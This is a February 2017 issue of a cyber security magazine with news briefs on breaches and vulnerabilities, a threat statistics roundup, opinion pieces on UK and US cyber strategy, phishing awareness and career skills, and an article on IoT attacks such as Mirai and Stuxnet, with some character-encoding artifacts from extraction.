Cyber world online version with links by Lesia Kozub

February 2017

CYBER WORLD Rounding up the latest in Cyber Security

In this monthâ&#x20AC;&#x2122;s edition: Latest News Newest Vulnerabilities Monthly Cyber Analysis Special Guest (Faisal Al Bannai, CEO, DarkMatter) Expert Opinion (Talal Rajab) Key Cyber Security Skills in the Digital Age (Kevin Murphy) How to Tackle the Human Aspect of Cyber Security (Daryl Flack) IoT - Security Issues in Factory Automation and Control Rising Star (Siming Wei) Upcoming Events

CyberWorld.News

Hello. Welcome to the February 2017 edition of Cyber World - the monthly magazine that brings you the latest news in the world of cyber security. We bring you analyses from leading industry professionals, academics and rising stars in the industry, together with a roundup of the latest industry news, latest vulnerabilities and threat intelligence. In this edition, we are proud to present a special guest contribution by DarkMatter founder and CEO, Mr Faisal Al Bannai. We are also excited to publish analyses by Daryl Flack, co-founder and CIO of Blockphish and security lead for the Smart Metering Implementation Programme at the Department for Business, Energy and Industrial Strategy (BEIS). We also have an article by Kevin Murphy, a cyber Security, risk and privacy specialist at the Royal Bank of Scotland and president of the ISACA Scottish Chapter, and by Talal Rajab, the Head of Programme at techUK for Cyber and National Security. This edition also includes an analysis on â&#x20AC;&#x2DC;IoT - Security Issues in Factory Automation and Controlâ&#x20AC;&#x2122; as well as an interview with the Rising Star Siming Wei, a Cyber Security senior associate at PwC. We are also excited to present the new look and feel of our magazine. As always, we thank all our readers for their interest and valuable feedback, and we look forward to your continuous engagement with our magazine. If you enjoy this magazine, feel free to share it with your friends and colleagues, and your feedback is always welcome.

Laith Gharib Managing Director

Major Incidents Rounding up the news

Siblings Arrested Over Italian Elites’ Hack

Hackers Seize Exposed MongoDB Databases

Police have arrested a brother and sister in Italy who are suspected of having targeted the communications of former Italian PM Matteo Renzi, former PM Mario Monti, Mario Draghi, the head of the European Central Bank, a cardinal and many other VIPs.

MongoDB is a so-called big data, unstructured database. It is popular with JavaScript programmers because you interact with it in JavaScript, and it stores records in JSON (JavaScript Object Notation) format. The problem with it is that the default installation does not set any kind of authentication.

The pair was caught when they sent a phishing email to a security researcher who turned it over to the police.

The Guardian reports that the hackers stole financial information and then used it ‘in order to make financial gains’, presumably in the financial markets, since there is no evidence of blackmail or of them having sold this data.

Researcher Niall Merrigan has now reported that hackers have seized 28,000 of these and held them for ransom. Hackers find these open databases using portscan and a programme called Shodan. They delete all the data but insert one record providing an email address where the victims can send payment to in order to get their data back.

Read More on Threat Post

FEBRUA RY 2 017

iTunes and App Store Vulnerable to Malware Vulnerability Lab showed that a user can enter JavaScript into the iTunes screen where users sign up to receive notification of a new app. The field is supported to be static, but a coding error causes the value entered there to be evaluated as a command. The Notification function lets a hacker spoof the email address. So the hacker can sign up for notification and use Apple to send its phishing malware to an Apple user. Read More on Vulnerability Lab

FTC Files Injunction against D-Link The FTC filed a Complaint for Permanent Injunction and Other Equitable Relief against D-Link Corporation, maker of routers and IP cameras. The complaint says, ‘defendants have failed to take reasonable steps to protect their routers and IP cameras from widely known and reasonably foreseeable risks of unauthorized access…’ This includes ‘hard-coded user credentials and other backdoors and command injection flaws…’ The FTC also chastises them for storing passwords in clear text. The targeted devices are N300 Router, N Dual Band Router, and N Network Cameras. Read More on ITPro

New Malware Threatens Mac and Linux Fruitfly, aka Quimitchin, is a newly discovered ‘old’ malware that targets Linux and Mac systems. It is targeted at Mac, but also works on Linux, since Mac shares some Linux functions. Malwarebytes uncovered this issue when they noticed an infected machine making connection to different IP addresses. The computer was sending out screen prints. They do not know how long the code had been on the machine, but speculate it could have been there for some years. One reason for that is the coding techniques show a limited understanding of Mac and some aged design principles. Apple has released a fix. Read More on HackRead

C Y BER WORLD

â&#x20AC;&#x153;

Researchers at the DEFCON conference demonstrated how to take over a Samsung camera

FEBRUA RY 2 017

Monthly Analysis November-December Threat Roundup

Global Distribution of Attacks November and December saw an increase in attacks, 74 and 103 attacks respectively, from previous months. This could be due to the Christmas vacation giving hackers more time to seek out targets. The US only represents 38% of attacks over the two month period, which shows the attacks were more widely distributed to other parts of the world, as seen for example in the increase in the attacks in India.

UK India

Global Israel

Ecuador

Global Distribution of Attacks

Middle East

International

Asia Pacific

C Y BER WORLD

Europe

North America

Attack Timeline The graph to the right represents the 61 days in the two month period, with the usual ups and downs, especially from the beginning to mid November. There was also a slight spike in activity the week before Christmas, followed by a sharp dip on the 22nd of December.

November-December

Top Sectors Targeted The Government sector experienced nearly double the breaches than the second most targeted sector — Online Services — with 37 attacks. There was a significant increase in the attacks in the ‘Other’ sectors category which includes a large number of universities that were attacked. The remaining categories, Healthcare, Finance, and Single Individuals experienced 23, 18 and 6 incidents respectively.

FEBRUA RY 2 017

Most Used Attack Vectors

Credentials (Exponential Scale Used)

The pie chart shows a relatively even distribution of the attacks across the different attack vectors. Account Hijacking was the most prominent known vector, which could be a result of the OurMine Twitter account hijackings that occurred. There was also a significant increase in DDos attacks with services like Steam and Tumblr suffering outages for several hours. SQLi makes a strong return, having been absent in our December editionâ&#x20AC;&#x2122;s analysis.

25%

16% 13%

15%

11% 10% 10%

Credentials Stolen In three days alone, over 100 Million credentials were leaked. It is interesting to note that when comparing the timeline with the credentials stolen, there appears to be no correlation. This suggests that these large credential breaches are the result of only one attack. November-December

C Y BER WORLD

VisDa

Take control of your data A revolutionary complete track and trace tool that visualises and analyses data transfers to understand what, how and where information is moving to achieve regulatory compliance. Key Features: GDPR transfers compliance score Instantly identify high risk communications All files transferred across a network are stored and recorded All content is fully text indexed, so information can easily be accessed Scalable, our solution is proven on networks that operate up to 1Tb/s

www.secgate.co.uk/visda

Special Guest

Faisal Al Bannai

C Y BER WORLD

Making the Case for a Ministerial Cyber Security Appointment About the Author: Faisal Al Bannai is Founder and Chief Executive Officer of DarkMatter, an international cyber security company based in the UAE, which is empowering digitisation globally. He can be reached on Twitter @albannai_faisal

In February 2016, President Obama established the Commission on Enhancing National Cyber Security with an Executive Order. The Commission completed its report on December 1, 2016, providing detailed short-term and long-term recommendations to strengthen cyber security in both the public and private sectors, while protecting privacy, fostering innovation and ensuring economic and national security. The report emphasises the need for partnerships between the public and private sectors, as well as international engagement. It also discusses the role consumers must play in enhancing the US’ digital security. The report categorises its recommendations within six overarching imperatives focused on infrastructure, investment, consumer education, workforce capabilities, government operations and requirements for a fair and open global digital economy. The six imperatives are: 1. Protect, defend, and secure today’s information infrastructure and digital networks. 2. Innovate and accelerate investment for the security and growth of digital networks and the digital economy.

3. Prepare consumers to thrive in a digital age. 4. Build cyber security workforce capabilities. 5. Better equip government to function effectively and securely in the digital age. 6. Ensure an open, fair, competitive, and secure

“

global digital economy.

The report emphasises the need for partnerships between the public and private sectors...

The Commission’s recommendations are not binding, though it would be prudent to at least consider the report’s references and overviews given the broad base of expertise drawn on in the preparation of the document, including consultation with technical and policy experts, input from the public through open hearings and a request for information, and reviewed existing literature. The heightened level of cyber threat on a national level is not just a US phenomenon but a trend that

FEBRUA RY 2 017

is growing across the globe, and it is high time cyber security is reflected within every government ministry and agency as a core function, with a direct reporting line to senior officials clearly defined and implemented. The importance of securing digital infrastructure has become as important to a nation’s continued development as its choice of domestic or foreign policy, and in many ways cyber security spans both of these important areas given the rise in threats emanating from within countries and those being faced from abroad. The six imperatives included in the Enhancing National Cyber Security report offer a strong framework for any progressive nation anywhere in the world to consider its cyber security posture and to take pro-active measures to improve its defences given the uncertain nature of threat actors, be they nation states or hacktivists, common criminals or other unknown adversaries. It is telling that the first imperative in the report relates to, “protecting, defending, and securing today’s information infrastructure and digital networks” as a guiding requirement, given we believe this is the key factor in creating a trusted and sustainable digital environment in which all participants have confidence to invest in and prosper from. This imperative is aligned to the Cyber Security Life-Cycle, which advises the planning, detection, protection, and recovery of digital assets in order to mitigate against the threat of a cyber incident. A holistic, end-to-end approach to cyber security is the most effective way to counter the ever-expanding cyber threat landscape, as it is clear that preventing or avoiding every cyber incident is just not possible. Faisal Al Bannai Co-founder and CEO of DarkMatter

C Y BER WORLD

â&#x20AC;&#x153;

The heightened level of cyber threat on a national level is not just a US phenomenon but a trend that is growing across the globe...

FEBRUA RY 2 017

Third Party Risk Management. Do you: rely on third parties to deliver services to clients? trust third parties with your companyâ&#x20AC;&#x2122;s confidential data? integrate networks, systems or applications with third party solutions? assess your suppliers for their criticality?

We will: build you an operating model to identify and reduce third party risk. Implement an end to end third party risk management process within your business. manage and deliver your third party assurance programme. support your supplier criticality assessments.

Get in touch for a free consultation info@secgate.co.uk

IoT â&#x20AC;&#x201D; Security Issues in Factory Automation and Control

An IoT DDOS attack against DYN.com in October used factory automation equipment to take down Netflix, Twitter, Amazon, and other high profile sites in large sections of the USA for several hours. DYN.com is a CDN (content distribution network) responsible for caching and replicating content around the world. Hackers used the default user ID and password built into IP cameras to create a botnet. This open IoT component was a large security hole that not many people had thought about before. Cyber defences are traditionally focused on hardening the IT systems in the plant, and not the factory automation devices themselves.

Here we look at that exploit, and more generally at the nature of IoT in the factory. FACTORY AUTOMATION There are two sides to IoT in the factory: Factory automation and the sensor-driven IP operating across wired and wireless networks. The second is what we usually think of when we write about IoT. But if you talk to engineers who programme PLC devices, they will tell you that they have been doing IoT for decades. The only thing new is the name assigned to it.

v C Y BER WORLD

True. Yet the difference is that today there is the cloud, big data databases, and analytics. But programming a serial or ethernet PLC device to control a lathe, welding machine, or painting machine is still an old-fashioned ordeal of programming ladder logic using desktop PC software like RSLogix for the Allen Bradley serial PLC devices. This kind of tedious programming has nothing to do with writing web services or otherwise using a full-featured programming language. Instead, the PLC programmer writes memory address information using the designation â&#x20AC;&#x2DC;fileâ&#x20AC;&#x2122;, which is a file location and offset. The offset is the length of the data element. In the DF1 industrial protocol, the offset is the length of a single field, where the offset from the fileâ&#x20AC;&#x2122;s initial location is

the size of the element and element number. That size is given in hexadecimal, decimal, or octet notation. The values are written as a string of single values. These are simple commands like start, stop, change baud rate, rotate, etc. that together describe a complete industrial process. Industrial network routers convert this serial (or ethernet) data to send to other serial or ethernet devices, and the management cloud. So it is difficult to imagine a hacker hacking that, since they are focused on PC hardware and network devices. Yet, attacking PLC devices is exactly what the

FEBRUA RY 2 017

American spy agencies allegedly did in 2010. They are said to have attacked Siemens PLC controllers that ran the centrifuges in Iranian nuclear fuel enrichment facilities. The Stuxnet worm was introduced by a phishing attack on Windows PCs. That attack caused the centrifuges to spin out of control and break. That wildly effective, daring operation dealt a huge blow to Iranâ&#x20AC;&#x2122;s nuclear programme. SENSOR-DRIVEN IOT The other side of IoT is sensors deployed for preventive maintenance, predictive models, measuring uptime, and gathering data to make changes to the line. That is done by adding assembly and subassembly stations, adding shift operators, improving training, and shifting material flow. Acoustic sensors ping devices and measure resonance

to test the quality of materials and the completed product. They use transducers to convert mechanical to electrical energy to check vibration. Increased vibration indicates when a machine needs new filters, maintenance, or calibration. Plants count items with cameras to measure operator and station productivity. They check emissions, temperature, humidity, ambient light, etc. All of this data is used to operate the plant in real time and fine tune the factory floor through offline, after the factor analysis, and make changes to the assembly line, using planning software designed for that. IP CAMERA EXPLOIT The October attack was caused by an IoT device that its Chinese manufacturer has since replaced. Hackers planted the Mirai DDOS malware in IP cameras and

C Y BER WORLD

DVR recorders made by XiongMai Technologies, and unleashed up to 1.4 TBPS DNS traffic to the DYN.com cloud. That caused more traffic than the servers could respond too, thus taking them offline. IP (internet protocol) cameras are obviously connected to the internet, so there is no need to attack them at any wireless industrial or wired non-Ethernet protocol, as would be the case with an industrial controller. And the camera’s IP network is what let hackers discover their location in the first place.

DDoS which uses the DNS protocol it can be difficult to distinguish legitimate traffic from attack traffic.” Despite their efforts to surge bandwidth and shape traffic, two successive waves of attacks overwhelmed their systems for several hours. The source code for Mirai is freely available on the internet. So the hackers did not write anything new. One part of the attack came from the Mirai command and control center, showing perhaps an increased level of sophistication that warrants further analysis.

The hackers planted the malware easily because the devices had the default userid and password. The password was hard-coded into the firmware. The hackers could log in with telnet and ssh.

This botnet was also released on the security blog Krebs and the French ISP and hosting company OVH earlier last year. Different parties have claimed responsibility, although no group has of yet been confirmed as the actual culprit. The consensus is this was not state-sponsored.

In the write-up analyzing the attack, DYN.com made clear what the problem is when they wrote: “During a

FEBRUA RY 2 017

Forest Tree The most advanced cyber security solution Forest Tree is a patented advanced Cyber Security solution that allows organisations to monitor and understand the content and context of each electronic communication channel, from documents leaving the organisation, malicious traffic, to user behaviour. The captured network information is processed and systematically analysed in order to extract all the information and metadata contained in the communication channels.

High performance: 1 Tb/s Unique: Patented technology Highly scalable: Big data storage Proactive: Block advanced threats Intelligent: In-depth analysis Low Maintenance: Purpose built

A single platform solution:

Network Forensics Anomaly Detection Security Analytics User Profiling Machine Learning

We detect advanced threats in seconds and neutralise them in milliseconds www.foresttree.co.uk A defence-grade cyber security product built for the Enterprise, Government and SME marketplaces. Our partner’s ground-breaking monitoring technology – built and improved over 20 years of securing the world’s most sensitive government and commercial information – protects you against the most sophisticated and advanced cyber threats. This coupled with an enhanced Artificial Intelligence engine allows Forest Tree to learn and become an increasingly more effective and efficient tool. The modular approach taken during the development of the Forest Tree solution ensures clients have high levels of personalisation available.

How to Tackle the Human Aspects of Cyber Security Daryl Flack

About the Author: Daryl Flack is Co-founder and CIO of Blockphish and Security Lead for the Smart Metering Implementation Programme at the Department for Business, Energy and Industrial Strategy (BEIS). Previously, he was CIO of AXELOS, a joint venture between Capita Plc and the Cabinet Office. Not a day goes by without another cyber breach hitting the news. Recently, we’ve seen breaches impact corporations, individuals and our political systems: • • •

€53 million stolen from an aerospace parts manufacturer via a phishing scam; The US elections potentially influenced following a hack on the Democratic National Committee; 1.5 billion individual’s data stolen from Yahoo in two enormous breaches.

As the number of cyber-attacks increases, so does the potential negative impact to every one of us. If we are

to reduce the frequency and volume of cyber breaches and the impact they have, then we are going to need to do more to tackle the human aspect of cyber security. The causes of these incidents may all be different, however, analysis shows that human actions are overwhelmingly at the heart of the vulnerabilities, and that attackers are actively seeking to exploit our human weaknesses to compromise target systems. Often, this is through an employee being tricked using social engineering. For example, up to 91% of cyber-attacks begin with a phishing or spear phishing email. If we can reduce our susceptibility to these attack methods, it will significantly improve our cyber security.

C Y BER WORLD

The act of phishing is aimed at trying to solicit a response from a person or group of people via mediums such as: • • • • •

Email Text (also known as ‘smishing’) Phone calls / voicemails (also known as ‘vishing’) Social media, or A combination of some or all the above.

The reason why this form of attack is so successful is because the structure and content of these communications are specifically designed to prey on basic human behaviours that we all exhibit. They borrow from the same techniques that people have used for centuries to try and influence others, either consciously or unconsciously. Some examples of the techniques include: •

An urgent request

• • •

Instruction from someone in authority Curiosity Appealing to your compassion

If the subject matter is compelling enough, it can be hard to resist the urge to carry out the attacker’s request. Susceptible as we may be to our emotional responses, all is not lost. We are adept at assessing and understanding potential threats or risks. However, how people perceive threats can be subjective based on their personal circumstances and the relevance of a threat to them. If we don’t appreciate the likelihood of a threat happening, then we’re less likely to adjust our behaviour. This is one of the challenges of tackling threats such as phishing: We don’t see a simple everyday task such as opening and responding to emails as being a threat. To address this, there needs to be a greater understanding of what the threat is, how it could affect us or the company, how we can help to stop it, and

FEBRUA RY 2 017

most importantly to feel like we have an active part to play. It’s this feeling of responsibility, i.e. an emotional response that decides whether staff is an active part of your cyber defences or rather part of the vulnerability. Once you have that basic principle instilled, how do you ensure you have the right awareness programme in place to affect real changes to your staff’s behaviours? There are some basic principles that can be used to help in this regard.

“ •

MEASURABLE • •

Whatever learning you provide needs to be measurable so you can identify what works and what doesn’t. Be willing to take on feedback from your staff and change your approach accordingly. C Y BER WORLD

If we don’t appreciate the likelihood of a threat happening, then we’re less likely to adjust our behaviour.

This is also where ethical phishing campaigns, if tailored to suit your organisation and carried out correctly can have a huge benefit. By sending staff an initial ethical phishing email to attain a baseline at the outset, you can then follow up regularly with both ‘all staff’ campaigns and specific teams (spear Phishing) or individuals (Whaling) based on

the risks you face. This will provide you with insights into the effectiveness of your training.

ADAPTIVE, PERSONALISED AND APPROPRIATE •

REGULAR AND CONCISE •

•

Delivering a 1 hour session once a year won’t have a positive impact, or change behaviours for the better. The awareness learning content should be delivered in short modules of ideally 1-2 minutes but less than 10 minutes. Small nuggets of information that people can consume frequently without it affecting their productivity but will allow them to internalise the key messages.

•

FEBRUA RY 2 017

The content should use understandable language and be relevant to the audience. People won’t engage in the learning if they don’t understand how the concept or the scenarios it is portraying are relevant to them or their role. The learning should be tailored based on staff role, knowledge and skill levels. Consider short quizzes prior to assigning learning content for staff to complete. This will enable you and the staff to see if they already have the requisite knowledge in one area and allow them to focus their learning on areas in which they are less proficient.

UTILISE DIFFERENT LEARNING FORMATS •

Different people learn in different ways and at different speeds. This needs to be allowed for with different content types and delivery methods to provide accelerated learning.

•

Consider content such as videos, animations, games, simulations blended with traditional Learning.

•

Blend electronic learning with physical delivery mediums and communications such as lunch and learns, posters and other rich graphical content identifying the highest risks and threats. Specific breakout sessions with guest speakers work well too. The subject areas here can cover non-corporate areas of focus such as securing your Facebook profile or guidance around online shopping. By making some aspects of the subjects relevant to people in their personal lives, they’ll be more likely to adopt those good behaviours in their corporate lives.

TRY TO MAKE IT ENGAGING, COMPETITIVE AND ENJOYABLE

•

This is where the real behaviour changes can happen because if people enjoy something, they’re much more likely to remember it.

•

Consider using incentives and rewards. This can be anything from utilising points and leader boards to encourage competition to providing a sense of achievement or status. Recognition via benefits can be used too, such as small pay awards for those with the budget although nonfinancial incentives such additional annual leave or specific mentions on their annual appraisals can work just as well.

C Y BER WORLD

â&#x20AC;&#x153;

By making some aspects of the subjects relevant to people in their personal lives, theyâ&#x20AC;&#x2122;ll be more likely to adopt those good behaviours in their corporate lives.

FEBRUA RY 2 017

A good approach is to start out in a single risk area such as phishing and grow it over time to include other areas such as password security, social media, information handling and other relevant subjects. Ultimately, your staff can be one of your strongest defences against cyber-attacks. However, for you to make the most of this potential, your staff will need to: • • •

Feel it’s their responsibility to understand the threats and protect the company. Feel confident they’ve had the necessary training to know what to look for in a potential attack. Be vigilant in spotting attempted attacks.

•

Be diligent in reporting anything suspicious.

Technology will always be the first line of defence and is incredibly valuable in protecting your organisation but there will be times when the attackers get through. Then your staff are your last line of defence. Only once you have a cyber aware workforce with a security culture embedded within your organisation, can you be confident in your ability to be resilient to the cyber threats you face.

C Y BER WORLD

Daryl Flack, Co-founder and CIO of Blockphish

Key Cyber Security Skills in the Digital Age Kevin Murphy

C Y BER WORLD

About the Author: Kevin Murphy (CISM, CISSP, CESP, CEH, ISO27001) is a Cyber Security, Risk and Privacy Specialist at the Royal Bank of Scotland and president of the ISACA Scottish Chapter. He has more than 25 years of experience in enterprise IT processes and systems experience serving all service line clients in IT strategy, architectures, IT planning and project management, IT effectiveness and process improvements, systems lifecycles, and operations. A former police officer, Murphy received a Chief Constables commendation for a career which included front line policing, e-crime and drug enforcement. Moving into consultancy, Murphy was quickly nominated by the prestigious SC Magazine as one of the top emerging cyber security professionals in Europe.

In the past five years, we have seen the decline of ‘Information Protection’ and the rise of ‘Cyber Security’; the terms ‘Digital Age’ and ‘Internet of Things’ firmly established in our professional lexicon; the continued evolution of the cloud; and the immediate spectre of quantum computing as the next great technological advancement. By any measure, the cyber security professional is working within a whirlwind of change; the only true constant being humans (for now!) acting as the initiators of this change. The question can therefore be asked: What skills does the cyber security professional require to remain relevant in the workplace? Three core skills are required for a successful career now and for the foreseeable future. KNOW YOUR BUSINESS A first requirement is an understanding of the business for which cyber professionals are responsible. Whether this be banking, pharmaceuticals or oil and gas, cyber security professionals cannot be truly effective by simply overlaying generic controls in their environment to protect the information for which they are responsible. This will inevitably lead to gaps and inconsistencies, as some solutions will not be a natural fit to the business model or culture. The control environment should be shaped by the business context.

The key business drivers will affect the decision-making process, inform the overall culture and translate into a risk appetite which will determine what controls are invested in and applied. How does the cyber security professional obtain this perspective? It is clear that a mix of academic and experiential learning is a great approach. Firstly, no matter what industry you operate in, there will likely be introductory qualifications you can take to gain a better understanding of the business. For example, the ‘Professional Banker Certificate’ offered by the Chartered Banker Institute is a great introduction to the core concepts of banking. There are no entry requirements for the qualification and it generally requires only a few weeks of self-study. Gaining a professional qualification also has the benefit of demonstrating both your commitment to your business environment and increasing your credibility with stakeholders when engaged in debate. Business credibility can help gain access to the second key area in developing business knowledge – experiential learning. Though many of us may view our audit colleagues with trepidation, it remains one of the best areas in an organisation to gain an insight into the business and develop business knowledge. Any cyber security professional would benefit from a secondment or shadowing opportunity within an audit function. Primarily, audit will provide exposure

FEBRUA RY 2 017

to a range of issues facing the organisation, thereby offering the cyber security professional a holistic view when providing control assessments and solutions. Secondly, any professional would benefit from audit experience â&#x20AC;&#x201C; developing a cogent writing style, applying an investigative methodology, presenting fact-based conclusions, and the experience of having difficult conversations with positive outcomes are all valuable skills gained by the audit professional. The cyber security professional should not limit his or her experience to audit. Key skills can also be obtained by working in the risk function, thereby understanding the concepts of key risk indicators, performance indicators and risk appetite statements â&#x20AC;&#x201C; all important aspects when documenting a business case and detailing the return on investment should a particular

security solution be advanced. Other areas of note include Human Resources and Marketing to understand how personal information is handled and secured. In sum, the cyber security professional should maintain a healthy interest in all business functions to ensure an effective understanding of the information lifecycle. KNOW THE RISKS The second requirement to remain effective in the workplace is for the cyber security professional to maintain a base level of subject matter expertise. The diverging and increasingly sophisticated forms of technology, ranging from cloud to quantum computing, will make it increasingly difficult for the cyber security professional to specialise in more than one discipline. Their role will therefore evolve into

C Y BER WORLD

becoming an informed interface between technology and business stakeholders. To be effective in this ‘nexus’ function, the cyber security professional will require a common denominator of subject matter expertise. The globally recognized qualifications offered by ISACA are a good step in this direction, particularly the CSX Practitioner, CISM and CRISC designations. But what defines a ‘base level of expertise’? The cyber security professional should consistently review the risk landscape and challenge whether they have the expertise to provide informed comment on the threats an organisation faces. For example, in the previous decade, the ability to counter fraud through money laundering was a major area of focus for the regulator. Now, it can be argued that with the EU General Data Protection Regulation an

understanding of the data lifecycle in an organisation is fundamental to the role of the cyber security professional. ‘Privacy’ can no longer be seen as distinct from cyber security, since a key tenet of the legislation is how the confidentiality, integrity and availability of personal information are maintained. So, what are the risks in the foreseeable future? It is likely that with the onset of quantum computing, the cyber security professional shall require a more detailed understanding of cryptography as organisations transfer from classical computing to a medium where many current forms of encryption are obsolete. The cyber security professional will have a key role in managing this transition and interfacing with technology providers, business stakeholders, the privacy team, legal department and more.

FEBRUA RY 2 017

KNOW YOURSELF What will enhance the cyber security professionalâ&#x20AC;&#x2122;s ability to interface with such a diverse range of stakeholders on a myriad of subjects? Excellent interpersonal skills will clearly be a premium. How quickly can you synthesise many sources of information, then deliver this effectively in one paragraph or a fiveminute pitch to the executive? To ensure these skills remain effective, the cyber security professional has a responsibility to be objective in assessing his or her abilities and should consistently strive to improve. This development can be aided by employing the help of a more experienced mentor. Thankfully, many professional organisations now offer mentoring as part of their training environment. When development areas have been identified, the next step is to build these into an action plan with set goals and timeframes. Key to this process is the ability to practice these skills in a safe environment. For example, if you are nervous about an upcoming presentation to the board, practice first in front of your colleagues and slowly build that experience in a constructive environment. Also, volunteer for activities which use the skills you need to acquire as you will quickly develop confidence with practice. If these activities cannot be found in your organisation, ISACA has a designated area of the website where many opportunities can be found â&#x20AC;&#x201D; opportunities range from the development of academic programs to organising the next international conference. Finally, the ability to travel and work in different jurisdictions should not be understated. Drawing on our earlier discussion regarding business culture and linkage to risk appetites, the opportunity to work in different parts of the world can provide an invaluable experience in broadening both your interpersonal skills in how you interact with others and providing different approaches to common problems.

C Y BER WORLD

â&#x20AC;&#x153;

Many organisations now offer mentoring as part of their training environment.

FEBRUA RY 2 017

THE TAKEAWAY The role of the cyber security professional is unique: What other position requires conversations with so many other areas of the organisation? What profession encompasses such a range of topics from adequate fencing to cryptographic algorithms? Or skills that include presenting to an audience of 100 people and providing a one-paragraph summary for a press release?

be exciting and daunting in equal measure. To help navigate these challenges effectively, professionals must understand their business and know the risk environment to the extent they can provide an informed opinion. Ultimately the cyber security professional is a leader who should role model the values of continual improvement, be solution-orientated, always act in the best interests of the organisation, and help any colleague who requires assistance.

Presented like this, the cyber security profession can

C Y BER WORLD

Kevin Murphy Cyber Security, Risk and Privacy Specialist at RBS

Expert Opinion Talal Rajab

C Y BER WORLD

A techUK Analysis of the UK Government’s National Cyber Security Strategy About the Author: Talal Rajab is the Head of Programme for techUK’s Cyber and National Security programmes. He manages strategic relationships between Government and industry members on cyber and national security related issues, in particular through the Cyber Growth Partnership. He also leads techUK’s work on the Investigatory Powers Bill. He has a parliamentary background having joined techUK from the Industry and Parliament Trust (IPT), where he managed the IPT’s business relations and led on the Trust’s Cyber Security Commission.

On Tuesday 1st of November, the UK Government announced the publication of its National Cyber Security Strategy. Underpinned with a £1.9bn investment, it sets out how the UK will use automated defences to defend citizens and businesses against growing cyber threats, support the UK’s growing cyber security industry, develop a world-class cyber workforce and deter cyber-attacks from criminals and hostile actors. The Government would be the first to admit that past policies on cyber security have not achieved the scale and pace of change required to stay ahead of the ever changing cyber threat. For many digital services and products emerging on the market today security has been an afterthought. Too many organisations are suffering basic breaches, too few investors are willing to risk supporting entrepreneurs in the sector and there is a lack of graduates and others with the right skills emerging from the education and training system. To address these failures, the new £19.bn Strategy will therefore focus on three key themes:

DEFEND: This strand of the Strategy, focusing primarily on the UK’s critical national infrastructure, aims to ensure that the UK has the means to defend itself against evolving cyber threats, to respond effectively to incidents and to ensure UK networks, data and systems are protected and resilient. In this regard, the new National Cyber Security Centre (NCSC) will provide leadership to industry on key national cyber security issues, and work with the Ministry of Defence’s (MoD) Cyber to help the Armed Forces respond to a potential, significant national cyber attack through active cyber defence (ACD) measures. The ‘Defend’ strand of the Strategy will also focus on ensuring that all government digital services built or procured have security ‘built in by design’, working closely with the Government Digital Service (GDS), the Crown Commercial Service (CCS) as well as NHS Digital in order to implement new data security standards. This is an area that techUK will look at increasingly in 2017,

FEBRUA RY 2 017

ensuring that the Government’s digital transformation agenda is underpinned with security. DETER: The ‘Deter’ strand of the Strategy will be led by the intelligence agencies, the Ministry of Defence, law enforcement and the National Crime Agency, in coordination with international partner agencies. It will see the Government investing in detecting, understanding, investigating and disrupting hostile actions taken against businesses and the public sector, pursuing and prosecuting cyber criminals whilst reserving the right to take offensive action in cyberspace. One of the main objectives of this strand of the Strategy is to reduce cybercrime. Law enforcement has traditionally been underfunded in this regard, as highlighted by techUK’s recent ‘Partners Against 47

Crime’ report, so it is good to see a commitment to enhancing law enforcement’s capabilities and skills at a national and local level, as well as establishing a new reporting system in order to share information across law enforcement in real time. Interestingly, the strategy recognises the importance of encryption to the protection of the UK’s most sensitive information and stresses that the UK will continue to maintain its sovereign capability in this area, whilst working with industry to ensure that there are no ‘safe spaces for…criminals to operate beyond the reach of the law’. DEVELOP: This strand of the Strategy will focus on growing the UK’s cyber security industry, investing in accelerator

C Y BER WORLD

programmes, scientific research and skills. As part of this, the Strategy highlights the creation of two new cyber innovation centres to drive the development of cutting-edge cyber products and dynamic new cyber security companies as well as allocating a proportion of the ÂŁ165m Defence and Cyber Innovation Fund to support innovative procurement in defence and security. The Government will also support the creation of a growing cyber security sector, helping UK companies and academics develop the commercial and entrepreneurial skills required to grow. The two new cyber innovation centres will sit at the heart of this section of the Strategy, giving companies the required assistance to get their first customers and attract further investment. A proportion of the ÂŁ165m Defence and Cyber Innovation Fund will also be put towards this, as

well as the provision of testing facilities for companies to test products. Reassuringly, the Strategy also makes reference to the collective expertise of the Cyber Growth Partnership (CGP) that techUK continues to provide the secretariat for in order to focus further growth and innovation interventions. On the topic of cyber security skills, the strategy sets out a long term skills project that builds on existing work to integrate cyber security into the curriculum so that everyone studying computer science, technology or digital skills will learn the fundamentals of cyber security. This effort will also attempt to address the gender imbalance in cyber professions as well as people from more diverse backgrounds and will be spearheaded by a cyber skills advisory group made up of government, employers, professional bodies, and education providers.

FEBRUA RY 2 017

INTERNATIONAL ACTION Finally, the strategy recognises the importance of co-operation with international partners on cyber related issues. This includes an assurance that international law and human rights apply in cyberspace, a commitment to a multi-stakeholder model of internet governance, an opposition to data localisation and working towards the raising of cyber security capacity within partner countries. A large proportion of this section focuses on helping other countries develop and maintain their own cyber security, building their capacity to tackle cyber threats to the UK. TECHUK RESPONSE It is reassuring to see that, in its approach to cyber security standards within the digital economy, the Strategy takes an interventionist stance that aims to raise standards across the UK. The Government has admitted that a ’market approach’ to the promotion of basic cyber security hygiene has in the past not produced the required pace and scale of change, with take up of initiatives such as Cyber Essentials having been low. It is true that the market is not valuing and managing cyber risk correctly and techUK therefore welcomes the recognition that businesses need to ‘up their game’ in regards to cyber security. The Government has a role to ‘set the pace’ and lead the way by bringing its influence and resources to bear to address cyber threats, though it cannot do this alone. The strategy is also a lot clearer, for the first time, about the nation state cyber threats facing the UK and more confident and aggressive in its response to such threats. Whilst it could be argued that the strategy is too broad in certain areas, it is still good to see the Government aiming high and trying to ensure that the UK is a safer place to conduct digital business (though it will be difficult to cover all of the initiatives announced in a five-year plan). One criticism, however, is the lack of recognition within the Strategy that much of the world’s innovation in cyberspace comes from the US and increasingly the Far East. The Government should commit more heavily to engaging with innovators around the world, which will in turn help UK companies grow. Overall, the Strategy is a robust and comprehensive response from Government to the growing cyber threats that we face. It is now time for businesses across the country to step up and play their part in keeping their businesses and the UK as a whole secure. Talal Rajab Head of Programme, Cyber & National Security

C Y BER WORLD

â&#x20AC;&#x153;

It is reassuring to see that, in its approach to cyber security standards within the digital economy, the Strategy takes an interventionist stance that aims to raise standards across the UK.

FEBRUA RY 2 017

